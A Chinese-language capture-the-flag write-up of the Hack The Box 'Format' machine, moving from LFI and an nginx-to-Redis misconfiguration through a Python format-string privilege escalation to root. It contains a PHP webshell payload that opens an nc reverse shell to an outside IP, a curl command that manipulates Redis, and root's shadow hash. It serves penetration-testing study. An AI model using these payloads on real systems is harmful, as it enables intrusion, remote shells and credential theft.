基本信息
- https://app.hackthebox.com/machines/Format
- 10.10.11.213
data:image/s3,"s3://crabby-images/ffd4d/ffd4d23b3c45a885f03d903fde48c81ca3e2f1e0" alt=""
端口扫描
22,80,3000:
1 | nmap -sC -sV -Pn 10.10.11.213 |
80
直接ip跳转到app,加hosts,资源会加载主域名的,一起加了:
1 | 10.10.11.213 app.microblog.htb microblog.htb |
是一个Microblog:
data:image/s3,"s3://crabby-images/1d8c0/1d8c08e0c994494328434ba880be2c5ab20502f7" alt=""
3000
gitea 1.17.3:
data:image/s3,"s3://crabby-images/e38d8/e38d898788e0e956c860d1736e15fcefaf97a0dc" alt=""
gitea
gitea直接探索可以看到microblog的代码:
data:image/s3,"s3://crabby-images/e8b34/e8b34a58d51d63a2801a76d390a361fd6770f35e" alt=""
查看代码发现edit/index.php是从id参数获取文件名,写入txt参数提供的内容,看起来可以任意写文件,然后把id参数的内容即文件名追加写入到order.txt中:
data:image/s3,"s3://crabby-images/3490b/3490b033c0da020e3b6060f5f7b713622b7eea9e" alt=""
然后fetchPage是从order.txt中读取每一行作为文件名,读取内容进行输出,所以这里结合前面的,构成LFI:
data:image/s3,"s3://crabby-images/228cb/228cb713aa0c175af71b8769c44a2c3c2bd7629c" alt=""
MicroBlog
回到blog,注册账号测试创建一个blog,发现是直接分配一个子域名,需要加下hosts:
另外存在自动清理,后续操作要快
data:image/s3,"s3://crabby-images/f54b8/f54b8d960abde0291243745d68b857b96f0ae4d7" alt=""
LFI
测试,验证存在LFI:
data:image/s3,"s3://crabby-images/6b298/6b298423af9667b7176429b728960cc21396b75f" alt=""
nginx
利用LFI读取nginx配置文件,发现存在配置错误,结合前面的代码里有redis的socket,典型案例:
- Middleware everywhere and lots of misconfigurations to fix | Detectify Labs
https://labs.detectify.com/2021/02/18/middleware-middleware-everywhere-and-lots-of-misconfigurations-to-fix/
data:image/s3,"s3://crabby-images/7a028/7a0281d1a5633cab39dda330ffa868a21d0b5165" alt=""
根据文章我们是可以利用这个配置问题去操作redis
isPro
回到代码,发现pro用户存在uploads目录,而信息是从redis获取的:
data:image/s3,"s3://crabby-images/2a125/2a1256131e30609816974e7409b379e5068972b9" alt=""
data:image/s3,"s3://crabby-images/786ec/786ec03f9af3d23350317ea94f024dbad389e3d1" alt=""
Pro to webshell
所以首先我们去利用nginx的配置问题操作redis,把我们变成pro用户(响应502是正常的,直接回去刷新即可):
1 | curl -X "HSET" http://microblog.htb/static/unix:%2fvar%2frun%2fredis%2fredis.sock:miao%20pro%20true%20a/b |
data:image/s3,"s3://crabby-images/8ece0/8ece0fcfd5eb62e23200ebe64b6b0eb95e3c6469" alt=""
getshell
然后就可以利用任意写文件,写入webshell到uploads目录中:
1 | id=/var/www/microblog/miao/uploads/miao.php&header=<%3fphp+echo+shell_exec("rm+/tmp/f%3bmkfifo+/tmp/f%3bcat+/tmp/f|sh+-i+2>%261|nc+10.10.14.13+4444+>/tmp/f")%3b%3f> |
data:image/s3,"s3://crabby-images/577f7/577f71b9f9a5dc19ea4c4317e0acf72bc7cf976f" alt=""
redis
然后redis中获取信息,得到cooper密码,(shell问题不能交互执行就echo一次执行一条):
1 | redis-cli -s /var/run/redis/redis.sock |
data:image/s3,"s3://crabby-images/0ef9a/0ef9a0460c38813610828cb97dd0b508d9ba24bc" alt=""
user flag
cooper用户ssh登录,得到user flag:
1 | ssh cooper@10.10.11.213 |
data:image/s3,"s3://crabby-images/fcee3/fcee38818fb06f3320a7e5a30ebfb38720a3c999" alt=""
提权信息
lincense看起来是给blog那边的用户生成pro license的:
data:image/s3,"s3://crabby-images/5d27a/5d27a9191ca82bcd89ea3478eab350ca406d8957" alt=""
并且这是一个python程序,可以直接查看代码,根据代码发现我们的用户名被拼接进去,并且后面接的{license.license}
也算给格式化字符串提示了:
data:image/s3,"s3://crabby-images/0c073/0c073750a1f0cfe02e5405a597dbc1f7b3ea7b9a" alt=""
而用户名是从redis获取的,如果我们对其进行修改,那就可以利用Python的格式化字符串:
- Python format string vulnerabilities · Podalirius
https://podalirius.net/en/articles/python-format-string-vulnerabilities/
提权 & root flag
通过redis修改用户名,现在ssh连接就可以直接用交互式cli了
小坑,一个用户短时间内只能生成一次license,多次执行要等一会儿或者新建用户
1 | redis-cli -s /var/run/redis/redis.sock |
data:image/s3,"s3://crabby-images/64ab1/64ab13cca310be263849c68ab147f7dcc4202739" alt=""
data:image/s3,"s3://crabby-images/7f79c/7f79c4bedca3b58db20e71f32302cd460659e625" alt=""
root flag
得到的密码就是root密码,直接切过去:
1 | su - |
data:image/s3,"s3://crabby-images/7a30c/7a30c87bc12af5c2375d89f8e04fd0cebe911620" alt=""
shadow
1 | root:$y$j9T$tYoCSn/hikACa4FLjkFxx/$vg7mvtDQNyfOazsy/RpEgxOzAzSktNbOiJWZkTr9ynD:19443:0:99999:7::: |
参考资料
- Middleware everywhere and lots of misconfigurations to fix | Detectify Labs
https://labs.detectify.com/2021/02/18/middleware-middleware-everywhere-and-lots-of-misconfigurations-to-fix/ - Python format string vulnerabilities · Podalirius
https://podalirius.net/en/articles/python-format-string-vulnerabilities/